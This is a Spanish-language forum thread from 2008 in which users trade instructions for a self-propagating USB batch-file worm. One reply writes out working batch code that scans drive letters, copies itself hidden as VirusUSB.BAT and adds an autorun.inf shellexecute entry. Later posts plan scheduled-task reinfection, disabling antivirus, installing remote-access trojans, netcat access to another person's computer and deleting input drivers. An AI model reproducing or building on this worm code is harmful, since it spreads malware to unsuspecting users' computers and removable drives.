Punto Bat Perdido.

Iniciado por Chop, 3 Marzo 2008, 04:54 AM

0 Miembros y 1 Visitante están viendo este tema.

Chop

Espero que se encuentren bien yo los molesto con este pequeño pedido.

hace unos dias vi un post de un .bat que hablaba de como crear un pequeño gusano que se copiaba de las usb a la maquina y de la maquina a las USB me parecio genial y cuando volvi a buscarlo en el foro desaparecio.

he utilizado el buscador pero no lo encuentro alguno seria tan amable de pasar el link, si lo tiene por ahi.

gracias por adelantado :P

leogtz

Hola yo no he buscado pero para abrir un archivo al conectar la USB, puedes hacer esto:

Buscas el Autorun.inf de tu USB y lo editas con el notepad:

[autorun]
OPEN=ARCHIVO.BAT
ICON=ICONO.ICO


Espero y te ayude en algo...
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Chop

gracias en esas estoy..

pero me interesa mucho la parte que se contagie con otras usb aplicadas ala PC.

gracias de todas formas :D

leogtz

Hola de nuevo...

Mira he encontrado algo en mi disco duro y encontre esto:

Para lo que quieres hacer podrias hacer esto:


FOR %%A IN ( C E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\ (goto Hay) else (goto Nohay)

Ahi revisaria si existe una unidad C.....hasta Z y si la hay se va la etiqueta "Hay" y si no la hay se va a la etiqueta "Nohay".

Luego le agregas varios atributos al Bat en ejecucion:
attrib -h -s %0


copy %0 %%A:\VirusUSB.BAT & attrib +h +s %%A:\VirusUSB.BAT & attrib +h +s %0
Luego copias el Bat en ejecucion a la unidad encontrada con el Nombre de VirusUSB.bat y se le agregan atributos de Oculto y sistema al Bat


echo shellexecute=%%A:\VirusUSB.BAT >> %%A:\autorun.inf

Luego agregarias el VirusUSB.bat al Autorun.inf de la unidad encontrada.

attrib +h +s %%A:\autorun.inf

Luego agregarias atributos se Oculto y de sistema al Autorun.inf, para que no lo puedan editar.


Es un complemento, espero y te oriente un poco mas...


PD: Lo saque de un manual.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Chop

Gracias RockoX!!!

esta sobrado!!!  :o ahora creo que dandole una ejecucion  cronometrada con las tareas de windows. podria escanear nuevas unidades y asi infectar las usb's incertadas ...

Gracias se te agrade mil!!

~[uNd3rc0d3]~

yo lo tengo todo en un for ;)

ese for me ocupa 3 renglones en el block d notas en un monitor de 15 pulgadas  :laugh:

en si tengo un bat que se propaga por netbios,netcat,telnet,se copia en todas las unidades extraible y hdd, se copia en varias partes del hdd (obvio), p2p, y si entras en la web que hice un code en perl te lo descarga al equipo, red y perfiles

ademas trabaja con 42 modulos y si lo cerras se ejecuta de un lugar aleatorio de los que se copio a una hora aleatoria.....

y solo se propaga no hace nada XDD se propaga y se propagaç

pero me parece muy peligroso postear el code en un foro....tendriamos que pasarnos todos a linux XD

lo que me falta para terminarlo es que borre los drivers del mouse y el teclado.....pero tengo que usar mucho if exist por el tipo y marcas ;)

leete las reglas asi todos estamos mejor ;)

leogtz

De nada!, para eso estamos...

Y que tienes planeado meter en el Autorun?  :rolleyes:
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Chop

La verdad todavia estoy muy pollito en esto pero he estado jugando con instrucciones netcat, que estoy practicando con un amigo. jeje

lo extrano es que alprincipio era pra que desavilitara el antivirus y se installara un troyano pero no se porque los troyanos ocmo el poison ivy y el bifrost no me estan conectando pero el net cat si . wuuuju..

ahora el problema es que no se porque el servicio de tareas programadas de windows de su computador no se inicia aunque le corra un net start "task schedule" ... bueno ahora estoy investigando para hacer el .bat con schedule porque ese incombeninete.

POST DATA ::: deberias postear ese codigo que dice que es sumamamente bueno me encantaria analizar el code.. se ve muy poderoso jeje